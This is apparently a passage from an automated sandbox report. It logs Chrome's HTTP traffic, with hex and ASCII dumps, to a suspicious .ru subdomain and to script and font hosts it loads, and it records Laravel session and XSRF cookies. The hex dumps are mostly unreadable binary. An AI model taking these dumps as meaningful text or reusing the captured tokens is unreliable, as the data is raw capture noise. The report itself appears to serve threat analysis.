fe 9f 9b 86 24 fe fd 89 f6 8d ce 12 46 c6 33 8b b8 46 32 96 3d cb c8 b8 f6 62 ed fb c4 04 fa cc a4 d6 ab 09 ff 2e e2 d7 2f 5e b4 66 01 fb ac f7 e0 9e 3b eb f1
                                                Data Ascii: wFCcB\(["&-zRpH#}}X<=0,-:\C*n0pw"BaJQj-~G$aEot]:nP(#/LEWT&yxY1+uyBK7u>81a$F3F2=b./^f;
                                                2024-05-30 10:21:10 UTC748INData Raw: 28 5c bc 04 b5 b7 73 cb ef 1e e6 4e 80 b2 2a bf 7b 1d 0a cc 06 9e 7f 4e f5 7d b8 25 c4 45 c1 b2 13 15 1f e8 54 ca 77 b1 6c 5a 38 d6 0b 21 6f a2 7d 68 f8 45 21 0c fd f9 0d 61 99 d0 fd 22 7e 19 bf 66 bd 82 ab ad f9 d6 1c 5c 6b bd 24 ea 7a 03 f0 09 43 f9 2a 26 d4 12 a4 60 19 d6 91 53 50 3a 4b 0d 60 5a 3a 74 6b be f5 d6 9b e8 02 ba f0 86 f5 d6 c3 38 9c 6d b3 66 e2 37 46 4e 5a 7f 27 96 07 da 9a bb 41 f5 34 d8 48 3c 22 86 3f a8 fe 52 66 4c 58 30 a6 43 8d 48 8c 8f 9a 52 6e a6 22 83 40 6a 6a d8 be 91 a7 b8 f8 91 dd ec c6 bb e7 37 71 3d c7 37 dd 3d 70 92 d8 7e a3 60 ba 2b 4e 41 b9 5e a0 b5 0b 2c f9 1a 98 63 c9 24 cb b0 2a 62 27 a9 18 05 a7 52 38 da 62 2e 4a 4c ad 31 86 f1 51 43 46 2f b5 f8 9f ab 32 38 5e 8f ec ec 32 35 11 46 9d 3a 92 75 65 af 59 cb 70 b7 f5 10 be
                                                Data Ascii: (\sN*{N}%ETwlZ8!o}hE!a"~f\k$zC*&`SP:K`Z:tk8mf7FNZ'A4H<"?RfLX0CHRn"@jj7q=7=p~`+NA^,c$*b'R8b.JL1QCF/28^25F:ueYp
                                                2024-05-30 10:21:10 UTC1369INData Raw: 11 4c b9 65 66 58 28 56 91 e1 64 93 29 7b 49 42 60 ed 03 9f cb 18 22 48 2e 36 7a 83 03 35 3e 6a 6f 2f 4f 0f 91 68 05 13 81 22 5c c7 a8 b6 1b 5a 7e 9e ec 18 e9 ec db 4d dd c5 79 d6 39 63 8e 50 de 92 69 ba a9 29 09 85 41 a5 86 35 c2 9c ee ea a2 0d 46 69 bc 85 9e 62 63 a7 96 c5 98 32 8d fa e9 a6 3c 42 73 99 50 85 5d e8 fc 01 d6 90 c6 c7 45 c1 51 25 20 cf 23 ac 8d 3a 6f 4f e0 23 cc 22 dc 18 45 30 7d 8c e3 61 54 6b 6f 99 e5 62 75 53 ae 29 61 46 48 99 b1 47 a8 5a 59 5b d6 17 45 d8 15 d2 5b 98 91 13 6d 98 9e 99 4d e6 2c a1 8a ce 59 09 c4 8f 57 20 c4 c6 c5 42 3f e2 52 e2 72 d2 99 8f 8e 3e 6d 19 58 10 76 dd 69 88 0e 0c f0 d3 78 7b b9 2a 99 04 94 60 d7 9d 64 90 39 ce 6a 0a a5 82 fc df 8e 4b 47 9b 7b e3 a6 f8 4f 09 1c 20 73 dd fd cf ff e0 dc c5 92 32 5d 71 74 62 a6
                                                Data Ascii: LefX(Vd){IB`"H.6z5>jo/Oh"\Z~My9cPi)A5Fibc2<BsP]EQ% #:oO#"E0}aTkobuS)aFHGZY[E[mM,YW B?Rr>mXvix{*`d9jKG{O s2]qtb


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                36192.168.2.449784142.250.181.2284434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:10 UTC628OUTGET /recaptcha/api.js HTTP/1.1
                                                Host: www.google.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://f8gxf.oritelos.ru/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:21:10 UTC528INHTTP/1.1 200 OK
                                                Content-Type: text/javascript; charset=utf-8
                                                Expires: Thu, 30 May 2024 10:21:10 GMT
                                                Date: Thu, 30 May 2024 10:21:10 GMT
                                                Cache-Control: private, max-age=300
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Content-Security-Policy: frame-ancestors 'self'
                                                X-XSS-Protection: 1; mode=block
                                                Server: GSE
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Accept-Ranges: none
                                                Vary: Accept-Encoding
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                2024-05-30 10:21:10 UTC862INData Raw: 35 38 36 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                Data Ascii: 586/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                2024-05-30 10:21:10 UTC559INData Raw: 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e 67 65 74 56 61 6c 75 65 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 69 66 28 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 31 27 26 26 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 32 27 26 26 6c 21 3d 3d 27 63 6f 6e 74 72 6f 6c 5f 31 2e 31 27 29 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 7d 29 3b 7d 65 6c 73 65 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 44 48 33 6e 79 4a 4d 61 6d 45 63 6c 79 66 65 2d 6e 7a 74 62 66 56 38 53 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 3b 70 6f 2e 63 72 6f 73 73
                                                Data Ascii: recationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.prepend(m);}po.src='https://www.gstatic.com/recaptcha/releases/DH3nyJMamEclyfe-nztbfV8S/recaptcha__en.js';po.cross
                                                2024-05-30 10:21:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                37192.168.2.44978513.227.219.474434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:10 UTC536OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                Host: cdn.socket.io
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://f8gxf.oritelos.ru/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:21:10 UTC702INHTTP/1.1 200 OK
                                                Content-Type: application/javascript; charset=utf-8
                                                Content-Length: 45806
                                                Connection: close
                                                Accept-Ranges: bytes
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=31536000, immutable
                                                Content-Disposition: inline; filename="socket.io.min.js"
                                                Date: Tue, 16 Apr 2024 12:40:01 GMT
                                                ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                Server: Vercel
                                                Strict-Transport-Security: max-age=63072000
                                                X-Vercel-Cache: HIT
                                                X-Vercel-Id: fra1::vz9z2-1713271201165-3be2b8c00140
                                                X-Cache: Hit from cloudfront
                                                Via: 1.1 2dc050ab05a5052054de7d000d6c5f50.cloudfront.net (CloudFront)
                                                X-Amz-Cf-Pop: AMS54-C1
                                                X-Amz-Cf-Id: QoI5xK68iymPiVWdE0eckCiCL2n7wStPlzUlDtqZU-wwmBxTmXHsdQ==
                                                Age: 3793269
                                                2024-05-30 10:21:10 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                2024-05-30 10:21:10 UTC2180INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                2024-05-30 10:21:10 UTC16384INData Raw: 70 6f 72 74 2c 6e 2e 71 75 65 72 79 26 26 28 6f 2e 71 75 65 72 79 3d 6e 2e 71 75 65 72 79 29 29 3a 6f 2e 68 6f 73 74 26 26 28 6f 2e 68 6f 73 74 6e 61 6d 65 3d 66 74 28 6f 2e 68 6f 73 74 29 2e 68 6f 73 74 29 2c 44 28 66 28 72 29 2c 6f 29 2c 72 2e 73 65 63 75 72 65 3d 6e 75 6c 6c 21 3d 6f 2e 73 65 63 75 72 65 3f 6f 2e 73 65 63 75 72 65 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6c 6f 63 61 74 69 6f 6e 26 26 22 68 74 74 70 73 3a 22 3d 3d 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2c 6f 2e 68 6f 73 74 6e 61 6d 65 26 26 21 6f 2e 70 6f 72 74 26 26 28 6f 2e 70 6f 72 74 3d 72 2e 73 65 63 75 72 65 3f 22 34 34 33 22 3a 22 38 30 22 29 2c 72 2e 68 6f 73 74 6e 61 6d 65 3d 6f 2e 68 6f 73 74 6e 61 6d 65 7c 7c 28 22 75 6e 64 65 66 69 6e 65
                                                Data Ascii: port,n.query&&(o.query=n.query)):o.host&&(o.hostname=ft(o.host).host),D(f(r),o),r.secure=null!=o.secure?o.secure:"undefined"!=typeof location&&"https:"===location.protocol,o.hostname&&!o.port&&(o.port=r.secure?"443":"80"),r.hostname=o.hostname||("undefine
                                                2024-05-30 10:21:10 UTC2180INData Raw: 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 61 75 74 68 3f 74 68 69 73 2e 61 75 74 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2e 5f 73 65 6e 64 43 6f 6e 6e 65 63 74 50 61 63 6b 65 74 28 65 29 7d 29 29 3a 74 68 69 73 2e 5f 73 65 6e 64 43 6f 6e 6e 65 63 74 50 61 63 6b 65 74 28 74 68 69 73 2e 61 75 74 68 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 73 65 6e 64 43 6f 6e 6e 65 63 74 50 61 63 6b 65 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 70 61 63 6b 65 74 28 7b 74 79 70 65 3a 45 74 2e 43 4f 4e 4e 45 43 54 2c 64 61 74 61 3a 74 68 69 73 2e 5f 70 69 64 3f 69 28 7b 70 69 64 3a 74 68 69 73 2e 5f 70 69 64 2c 6f 66 66 73 65 74
                                                Data Ascii: value:function(){var t=this;"function"==typeof this.auth?this.auth((function(e){t._sendConnectPacket(e)})):this._sendConnectPacket(this.auth)}},{key:"_sendConnectPacket",value:function(t){this.packet({type:Et.CONNECT,data:this._pid?i({pid:this._pid,offset
                                                2024-05-30 10:21:10 UTC8678INData Raw: 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 65 6d 69 74 45 76 65 6e 74 28 65 29 7d 29 29 2c 74 68 69 73 2e 72 65 63 65 69 76 65 42 75 66 66 65 72 3d 5b 5d 2c 74 68 69 73 2e 73 65 6e 64 42 75 66 66 65 72 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2e 6e 6f 74 69 66 79 4f 75 74 67 6f 69 6e 67 4c 69 73 74 65 6e 65 72 73 28 65 29 2c 74 2e 70 61 63 6b 65 74 28 65 29 7d 29 29 2c 74 68 69 73 2e 73 65 6e 64 42 75 66 66 65 72 3d 5b 5d 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 64 69 73 63 6f 6e 6e 65 63 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 64 65 73 74 72 6f 79 28 29 2c 74 68 69 73 2e 6f 6e 63 6c 6f 73 65 28 22 69 6f 20 73 65 72 76 65 72 20 64 69 73 63 6f 6e 6e 65 63
                                                Data Ascii: forEach((function(e){return t.emitEvent(e)})),this.receiveBuffer=[],this.sendBuffer.forEach((function(e){t.notifyOutgoingListeners(e),t.packet(e)})),this.sendBuffer=[]}},{key:"ondisconnect",value:function(){this.destroy(),this.onclose("io server disconnec


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                38192.168.2.449787188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:11 UTC1389OUTGET /89Lx2AXVud2xlUwbPNlje12zdhl4A2IPyz79 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://f8gxf.oritelos.ru
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: font
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:12 UTC629INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:12 GMT
                                                Content-Type: font/woff2
                                                Content-Length: 43596
                                                Connection: close
                                                Content-Disposition: inline; filename="89Lx2AXVud2xlUwbPNlje12zdhl4A2IPyz79"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zwKZD8XtiOuLlYQnStLK8baBggVA8WrSiVbll%2BuuiLGipRwzqibPEOB0kO1APVi2IIWa1rkD7wfJ53ez4DIlJ65Nu9mBBFD9rMgHw9XA6Wj52SuyrdSdCXbv%2BbeCvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfef31b1c334e-EWR
                                                2024-05-30 10:21:12 UTC740INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
                                                Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
                                                2024-05-30 10:21:12 UTC1369INData Raw: 44 96 e1 11 7d 20 8c 8e 20 be ec 62 a6 ec fc 7d 44 49 76 75 d1 71 04 88 0f d8 6b cb 96 34 d2 0c f7 cc 14 40 c0 10 ce d5 ff 50 2a b0 b0 6a dc ed 89 29 f7 ec 94 27 df 4c 97 eb 89 c9 c2 ae b3 dc b1 62 e0 85 52 51 6a 49 2a 49 9b b4 51 6b da 54 ae 6c fa 5f 77 4f 0f d0 92 24 cb 1f e8 08 21 63 cc 2e 25 cb 7b 80 95 5f 4e 90 02 45 40 fc 00 0d 92 41 b0 da 9d f9 3f 9c ee 9a d9 61 57 0b 79 99 67 66 9d 67 1b 26 45 bc 0c f7 20 7e 88 78 f0 62 c5 cc 83 05 b5 62 c1 82 85 7e f8 a7 d6 f4 ef 1e 66 2f 80 a8 0a 1e d0 47 8a 82 b3 9d 4a 1b 36 b2 79 fe b3 df fa 0e 7a 45 40 54 9c 61 aa 30 5e 55 6c f6 df cf 06 00 fc 53 3a c3 bf 92 2c 03 9e 7d 04 1b 42 ec 52 a7 a8 52 74 7e b7 76 d1 85 00 ba 4c 3a 60 34 c1 49 4b 41 1c e6 bd a7 56 a3 ca b1 b7 78 26 40 a1 1f 8f 68 a8 37 83 50 05 fe bd
                                                Data Ascii: D} b}DIvuqk4@P*j)'LbRQjI*IQkTl_wO$!c.%{_NE@A?aWygfg&E ~xbb~f/GJ6yzE@Ta0^UlS:,}BRRt~vL:`4IKAVx&@h7P
                                                2024-05-30 10:21:12 UTC1369INData Raw: 6d d7 b6 39 fb 46 fb 99 7d 9e 5d 57 72 91 73 73 4b bc 1c 72 12 ba 1e 36 36 7c 33 22 22 2a 2a 26 26 21 c1 e1 10 c5 bc bc 32 65 90 3a 76 de b1 83 76 d7 75 c7 d1 ff bd fa ef 37 7f f3 ee 97 3e fc ec d3 2f 3e 0d 7f 59 f7 9d e0 41 40 40 00 c8 82 05 10 40 c9 06 6a 8b 76 3f a2 63 04 fc cf bf 1a e0 05 82 e1 03 a0 ae 09 a0 0b f4 c0 a3 aa 1c 80 71 5b ad cd 01 38 80 ba 26 50 ed 76 16 e9 84 82 9d 77 d3 ef ac 8c 5b 06 e0 52 8b 81 00 1e 2c a6 f3 af 20 bc 4c 15 e0 d4 43 23 d6 51 35 b8 91 3c 4e 8d af 4d f0 9a f0 ff 89 98 49 1e c3 96 a1 ef 1e ef ae 41 39 d4 0e be a1 72 98 1c b4 98 29 ef a4 9e 40 7d 80 28 93 fa a9 ef 70 df d3 54 b5 e2 d5 ba 81 b2 f7 81 f6 10 fa 79 c4 7a c4 26 c4 11 70 a2 46 71 8f 62 7e 37 d0 ca bd 8a d4 e0 c1 fc fb 48 b3 d9 1f 86 2f e5 9b 9b b5 38 d8 c7 bd
                                                Data Ascii: m9F}]WrssKr66|3""**&&!2e:vvu7>/>YA@@@jv?cq[8&Pvw[R, LC#Q5<NMIA9r)@}(pTyz&pFqb~7H/8
                                                2024-05-30 10:21:12 UTC1369INData Raw: 13 01 e9 44 ae 3d cb 5b 69 7e db 22 51 70 ef 63 32 39 e9 64 71 a7 b5 30 b6 01 15 1a 29 e2 db ce 53 01 4b 24 89 db 11 9c 91 10 7d 9c ef d5 0f e1 38 11 2a 9e 08 b1 c6 95 68 36 08 c4 a8 a2 b4 98 b5 21 8e 45 d0 71 24 18 a7 83 42 25 37 a3 0f 52 82 02 89 71 3b a6 33 e3 76 a8 96 c5 96 00 31 78 04 a8 30 14 19 d5 19 35 da 35 a1 cc 49 64 7a 77 af a4 2d 6a 48 d5 f9 10 15 85 2c 13 a3 9e f6 44 fc 18 de 56 cd 85 7c a5 47 ac 97 c9 a3 b9 57 e1 c4 0a 96 52 70 14 1b 9d cf 6b 27 9f a5 fa bd 08 79 02 2c 96 02 20 16 9d 4d 88 68 fb d6 4a 21 21 6d b6 8c 58 80 8a 4a bd a3 a3 79 25 a6 aa 2e 1a 3d c6 77 60 74 91 90 6a 2a 81 e2 98 32 ad 42 a4 cf 75 c9 16 1c 25 3d 79 6f 32 9f 8e cf 45 7e e6 05 e8 4e 24 f2 4f 2c 8e ab 2d 9c 9c 76 49 bb eb d8 5e de eb 78 af d8 0e f9 43 a9 e0 48 ac ab
                                                Data Ascii: D=[i~"Qpc29dq0)SK$}8*h6!Eq$B%7Rq;3v1x055Idzw-jH,DV|GWRpk'y, MhJ!!mXJy%.=w`tj*2Bu%=yo2E~N$O,-vI^xCH
                                                2024-05-30 10:21:12 UTC1369INData Raw: a5 86 5b 4a 69 0c d1 e1 b8 20 fc 23 8b 97 28 3f 36 3d bc 0d d8 3d 52 72 fe 9d 98 df f6 99 86 c4 bc 22 f8 09 5a 28 e5 b7 77 89 61 b7 36 f9 53 75 68 4b 1e a3 d9 26 75 d4 2c cc 9b ab c9 a0 c4 be a0 65 70 6a fc 71 23 f4 aa f8 fc 97 90 31 c6 86 3b 8d 2e bf 22 ac c8 63 a8 a4 64 cd 76 00 e5 20 65 ff cf 30 3f a6 13 d2 e5 62 0b a4 27 2d 7d 39 cc f0 e0 9e 1d af b5 ec 6f 86 84 31 96 bb 8e 91 1f de f5 79 ed 91 b4 46 3e b6 fa d8 67 65 be e3 e4 c7 96 8c a1 bb 91 79 70 21 64 5b 43 4a bb 5f ce 7f 6a 9e e2 6c 74 bd 98 84 44 03 65 56 43 e1 02 9a f1 01 c9 b2 0e 5a 9a 74 1e 19 d7 2d 04 6b 89 4f 3e 7f eb 62 e6 73 66 69 2d cd a3 e6 3f 27 75 aa 1d f4 11 10 73 fc 42 d2 5a c5 86 43 23 db 5e 68 e7 7a 4b d7 dd 63 72 dd 6d 59 de 57 ba ed 90 63 7c a6 8b 45 e2 fa ee ae 6f c3 10 c6 8a
                                                Data Ascii: [Ji #(?6==Rr"Z(wa6SuhK&u,epjq#1;."cdv e0?b'-}9o1yF>geyp!d[CJ_jltDeVCZt-kO>bsfi-?'usBZC#^hzKcrmYWc|Eo
